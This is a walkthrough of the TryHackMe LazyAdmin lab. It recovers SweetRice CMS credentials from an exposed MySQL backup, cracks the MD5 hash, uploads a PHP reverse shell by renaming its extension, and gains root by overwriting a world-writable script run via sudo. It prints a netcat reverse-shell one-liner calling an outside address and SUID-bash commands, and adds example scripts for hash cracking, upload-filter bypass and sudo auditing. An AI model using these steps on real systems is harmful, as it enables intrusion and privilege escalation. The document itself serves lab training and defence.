LazyAdmin TryHackMe Walkthrough
LazyAdmin is an easy-level Linux boot2root machine on TryHackMe. The path to root is: abuse an information disclosure bug in SweetRice CMS to recover login credentials, upload a reverse shell through the CMS to get a low-privilege shell as www-data, then abuse a world-writable script that a sudo rule runs as root to get a root shell.
Challenge Link: https://tryhackme.com/room/lazyadmin
Initial Enumeration
As usual I started the initial enumeration by running a port scan using nmap, looking for open ports and default scripts.
┌──(madhav㉿kali)-[~/ctf/thm/lazyAdmin]
└─$ nmap -sC -sV -oN nmap/initial 10.10.93.93
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-02 15:50 IST
Nmap scan report for 10.10.93.93
Host is up (0.17s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 49:7c:f7:41:10:43:73:da:2c:e6:38:95:86:f8:e0:f0 (RSA)
| 256 2f:d7:c4:4c:e8:1b:5a:90:44:df:c0:63:8c:72:ae:55 (ECDSA)
|_ 256 61:84:62:27:c6:c3:29:17:dd:27:45:9e:29:cb:90:5e (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.70 seconds
We have only two ports open: SSH on port 22 and an Apache web server on port 80. Let's start the enumeration with port 80.
The website shows only the default Apache 2 page, so next I ran a dirb scan to look for hidden files and directories.
┌──(madhav㉿kali)-[~/ctf/thm/lazyAdmin]
└─$ dirb http://10.10.93.93
-----------------
DIRB v2.22
By The Dark Raver
-----------------
URL_BASE: http://10.10.93.93/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.93.93/ ----
==> DIRECTORY: http://10.10.93.93/content/
+ http://10.10.93.93/index.html (CODE:200|SIZE:11321)
+ http://10.10.93.93/server-status (CODE:403|SIZE:276)
---- Entering directory: http://10.10.93.93/content/ ----
==> DIRECTORY: http://10.10.93.93/content/_themes/
==> DIRECTORY: http://10.10.93.93/content/as/
==> DIRECTORY: http://10.10.93.93/content/attachment/
==> DIRECTORY: http://10.10.93.93/content/images/
==> DIRECTORY: http://10.10.93.93/content/inc/
+ http://10.10.93.93/content/index.php (CODE:200|SIZE:2197)
==> DIRECTORY: http://10.10.93.93/content/js/
We have a directory named /content. When we visit it, we see a landing page which says that the website is still under construction.
We also see a line in the footer of the page which says "powered by Basic-CMS.ORG Sweet Rice". This is most likely the name of the CMS.
Under it there is a directory /content/as, which is the CMS login page, but it needs a valid username and password. I tried guessing some common usernames and passwords but none of them worked.
Next I searched for 'basiccms.org sweet rice', but instead of the project website or documentation, the top results were a few Exploit-DB entries XD. I looked through all of them and the interesting one was an information disclosure bug: SweetRice keeps its MySQL backups under inc/mysql_backup/ without any access control, so on this host they are reachable at http://10.10.93.93/content/inc/mysql_backup/.
I downloaded the backup file and opened it in a text editor. It contains the CMS configuration, including the password hash for the user manager.
SweetRice stores this as an unsalted MD5 hash, so it can be cracked offline with hashcat (mode 0) or John the Ripper, or simply looked up on a site such as crackstation.net. (hydra is an online login brute-forcer and is not the tool for a hash you already hold.)
The password turned out to be very weak. With the credentials recovered, we can log in to SweetRice CMS through the /content/as page we found earlier.
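What the cracking step does under the hood, as an added example (my own code, not from the original post and not how hashcat or John are implemented): a dictionary attack against an unsalted MD5 digest in POSIX shell. Each candidate is hashed exactly the way the CMS hashes passwords and compared with the digest from the backup; the wordlist path in the usage comment is an assumption.

```sh
#!/bin/sh
# Added example: what "cracking" the recovered hash actually involves.
# SweetRice stores the admin password as an unsalted MD5 digest, so cracking
# is a dictionary lookup: hash every candidate the same way and compare.
# hashcat (-m 0) and John the Ripper (--format=raw-md5) do this, only faster.

# Hash one candidate the way the CMS does: MD5 over the raw string, no salt.
md5_of() {
    printf '%s' "$1" | md5sum | cut -d' ' -f1
}

# crack_md5 <hex digest> <wordlist>: print the first matching word and return 0,
# or return 1 when no candidate in the list produces the digest.
crack_md5() {
    target=$(printf '%s' "$1" | tr 'A-F' 'a-f')   # normalise digest case
    while IFS= read -r word || [ -n "$word" ]; do  # also handle a last line with no newline
        [ "$(md5_of "$word")" = "$target" ] || continue
        printf '%s\n' "$word"
        return 0
    done < "$2"
    return 1
}

# Usage on the attacker box (wordlist path assumed):
#   crack_md5 <digest from the backup> /usr/share/wordlists/rockyou.txt
if [ $# -eq 2 ]; then crack_md5 "$1" "$2"; fi
```

The loop is deliberately the naive version: one md5sum process per candidate is slow, but it makes the point that nothing about an unsalted MD5 resists a wordlist beyond the cost of hashing the wordlist once.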
Initial Shell
After logging in, I found an option named Media Center that lets us upload our own files. If we can get a PHP file in there and request it, the server executes it and we get a reverse shell back to our machine.
We cannot simply upload the reverse shell as-is, because the upload form rejects files with a .php extension. That filter is a denylist of the one extension, though, while Apache's PHP handler on this box also executes other extensions such as .php5 or .phtml, so renaming the shell is enough. Uploaded files land in the /content/attachment/ directory; start a listener first, then request the uploaded file from there.
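The gap between the CMS upload filter and the web server's handler, as an added example that is not part of the original walkthrough or of SweetRice's code: the handler pattern is assumed from the Debian-packaged php7.0.conf of the Ubuntu 16.04 era (check the target's own mods-enabled/php*.conf), and the two filter functions and candidate filenames are constructed here to show why a denylist fails and what an allowlist has to do instead.

```sh
#!/bin/sh
# Added example: why rejecting only ".php" does not stop PHP execution.
# Apache's PHP module maps a whole family of extensions to the PHP handler,
# so an upload filter that only knows about ".php" and the web server
# disagree about what counts as a PHP file.

# Handler pattern assumed from Debian/Ubuntu's php7.0.conf (Ubuntu 16.04 era);
# verify against the target's own /etc/apache2/mods-enabled/php*.conf.
PHP_HANDLER_RE='.+\.ph(p[3457]?|t|tml)$'

# 0 if Apache would hand this filename to mod_php, 1 if it is served as static content.
apache_executes() {
    printf '%s' "$1" | grep -Eq -e "$PHP_HANDLER_RE"
}

# Vulnerable-style filter: block the one extension the developer thought of.
denylist_accepts() {
    case "$1" in
        *.php) return 1 ;;
        *)     return 0 ;;
    esac
}

# Hardened filter: allow a short list of non-executable extensions, compare
# case-insensitively, and require exactly one extension so names like
# "shell.jpg.phtml" or ".htaccess" are refused before the handler regex matters.
allowlist_accepts() {
    name=$1
    case "$name" in ''|*/*|*..*) return 1 ;; esac     # no paths, no traversal
    base=${name%.*}
    case "$base" in ''|*.*) return 1 ;; esac          # exactly one dot, non-empty stem
    lower=$(printf '%s' "$name" | tr 'A-Z' 'a-z')
    case "$lower" in
        *.jpg|*.jpeg|*.png|*.gif|*.pdf) return 0 ;;
        *) return 1 ;;
    esac
}

# 0 when the denylist would store a file that Apache then executes.
bypasses_denylist() {
    denylist_accepts "$1" && apache_executes "$1"
}

# Print how each filter and the web server treat one candidate upload name.
classify() {
    d=REJECT; denylist_accepts "$1" && d=ACCEPT
    a=REJECT; allowlist_accepts "$1" && a=ACCEPT
    x=static; apache_executes "$1" && x=EXECUTES
    printf '%-18s denylist=%-6s allowlist=%-6s apache=%s\n' "$1" "$d" "$a" "$x"
}

# Constructed candidate names, including the two extensions used on the box.
for f in photo.jpg shell.php shell.php5 shell.phtml shell.jpg.phtml .htaccess; do
    classify "$f"
done
```

The table the loop prints is the whole argument: every row where denylist=ACCEPT and apache=EXECUTES is a working upload bypass, and the allowlist column shows none of those rows survive a filter that decides by what the file is allowed to be rather than by what it must not be. Serving the attachment directory with PHP disabled (php_admin_flag engine off, or no handler for that path) is the server-side half of the same fix.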
┌──(madhav㉿kali)-[~/ctf/thm/lazyAdmin]
└─$ nc -lvnp 9001
listening on [any] 9001 ...
connection received from (UNKNOWN) [10.10.93.93] 37266
Linux THM-Chal 4.15.0-70-generic #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019 i686 i686 i686 GNU/Linux
15:03:30 up 2:50, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@THM-Chal:/$
Next I upgraded the dumb shell into a fully interactive TTY using the following sequence (Ctrl-Z backgrounds the shell, stty raw -echo plus fg hands our raw terminal to it, and the last two lines fix the terminal type and size):
python3 -c 'import pty;pty.spawn("/bin/bash")'
Ctrl-Z
stty raw -echo && fg
reset
export TERM=xterm
stty rows 48 columns 179
Next I checked the /home directory and found a single user, itguy. Inside that user's home directory we can read the user flag.
www-data@THM-Chal:/$ ls -lah /home
total 12K
drwxr-xr-x 3 root root 4.0K Nov 29 2019 .
drwxr-xr-x 23 root root 4.0K Nov 29 2019 ..
drwxr-xr-x 18 itguy itguy 4.0K Nov 30 2019 itguy
www-data@THM-Chal:/$ cd home/itguy/
www-data@THM-Chal:/home/itguy$ wc -c user.txt
38 user.txt
Root Shell
Next I ran sudo -l to check whether we can run any command as root, and found that user www-data can run a Perl script in itguy's home directory as root, without a password.
www-data@THM-Chal:/home/itguy$ sudo -l
Matching Defaults entries for www-data on THM-Chal:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on THM-Chal:
(ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl
When I checked the contents of /home/itguy/backup.pl, I found that all it does is execute another file, /etc/copy.sh, through sh.
www-data@THM-Chal:/home/itguy$ cat backup.pl
#!/usr/bin/perl
system("sh", "/etc/copy.sh");
Then I checked the contents of /etc/copy.sh and found that it is a netcat reverse-shell one-liner pointing at 192.168.0.190:5554, an address that is not ours XD.
www-data@THM-Chal:/home/itguy$ cat /etc/copy.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f
Next I checked the permissions of this file. Its mode is -rw-r--rwx: root owns it, but the "others" bits give everyone on the box write access, including www-data. Since the sudo rule runs it as root, we control what root executes. So instead of a reverse shell, I replaced its contents with a command that copies /bin/bash to /tmp and sets the SUID bit on the copy.
www-data@THM-Chal:/home/itguy$ ls -l /etc/copy.sh
-rw-r--rwx 1 root root 81 Nov 29 2019 /etc/copy.sh
www-data@THM-Chal:/home/itguy$ echo "cp /bin/bash /tmp/bash;chmod +s /tmp/bash" > /etc/copy.sh
Now when we run backup.pl through sudo, it creates a SUID-root copy of bash at /tmp/bash. Running that binary with -p (so bash keeps the effective UID instead of dropping privileges) gives us a root shell.
www-data@THM-Chal:/home/itguy$ sudo /usr/bin/perl /home/itguy/backup.pl
www-data@THM-Chal:/home/itguy$ cd /tmp
www-data@THM-Chal:/tmp$ ./bash -p
bash-4.3# id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
Hurray! We're now root and can read the final flag in the /root directory.
bash-4.3# cd /root
bash-4.3# ls
root.txt
bash-4.3# wc -c root.txt
38 root.txt
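An audit for this class of misconfiguration, added here and not part of the room or the original post: given a command line as printed by sudo -l, it checks the files named in the rule and, one level down, every absolute path they reference, and reports any that group or others can write. That is exactly the backup.pl to /etc/copy.sh chain above, where the sudo target itself is root-owned and read-only and the weak file only shows up one hop later. The temp-file layout in the usage is constructed; GNU stat is assumed.

```sh
#!/bin/sh
# Added example: audit a sudo rule for writable files in its call chain.
# A rule can look safe because the script it names is root-owned and
# read-only, while that script invokes a second file with weaker permissions
# (backup.pl -> /etc/copy.sh). This checks the files named in the rule and,
# one level down, every absolute path they mention.

# Absolute path literals inside a text file, one per line (binaries are skipped).
referenced_paths() {
    grep -Iq '' "$1" 2>/dev/null || return 0
    grep -oE '(/[A-Za-z0-9._-]+)+' "$1" | sort -u
}

# 0 if the group or other write bit is set, judged from the mode bits (GNU stat),
# so the verdict is the same whether the audit runs as root or as www-data.
group_or_world_writable() {
    mode=$(stat -c '%a' "$1" 2>/dev/null) || return 1
    perm=${mode#"${mode%???}"}        # last three octal digits: user group other
    group=${perm#?}; group=${group%?}
    other=${perm#??}
    case "$group$other" in *[2367]*) return 0 ;; esac   # 2, 3, 6, 7 carry the write bit
    return 1
}

# Report one file; 0 if someone other than its owner can write it.
report_if_writable() {
    group_or_world_writable "$1" || return 1
    printf 'WRITABLE  %s (%s) mode %s\n' "$1" "$2" "$(stat -c '%a' "$1")"
}

# audit_sudo_command "<command exactly as printed by sudo -l>"
# Returns 0 (and prints findings) if any file in the chain is writable.
# Arguments are split on whitespace, so paths containing spaces are not handled.
audit_sudo_command() {
    found=1
    for arg in $1; do
        [ -f "$arg" ] || continue
        report_if_writable "$arg" "sudo target" && found=0
        for dep in $(referenced_paths "$arg"); do
            [ -f "$dep" ] && [ "$dep" != "$arg" ] || continue
            report_if_writable "$dep" "invoked by $arg" && found=0
        done
    done
    return $found
}

# On the target: audit_sudo_command "/usr/bin/perl /home/itguy/backup.pl"
if [ $# -gt 0 ]; then audit_sudo_command "$*"; fi
```

Judging by mode bits rather than [ -w ] matters for an audit: run as root, -w is true for everything and the check tells you nothing. The fix on the defender's side is the mirror image of the finding: anything a sudo rule runs, and anything that thing runs, must be owned by root and writable by nobody else, which here means chmod 755 /etc/copy.sh (or, better, not having a NOPASSWD rule at all).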
That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!
NOTE: The awesome artwork used in this article was created by Alfrey Davilla.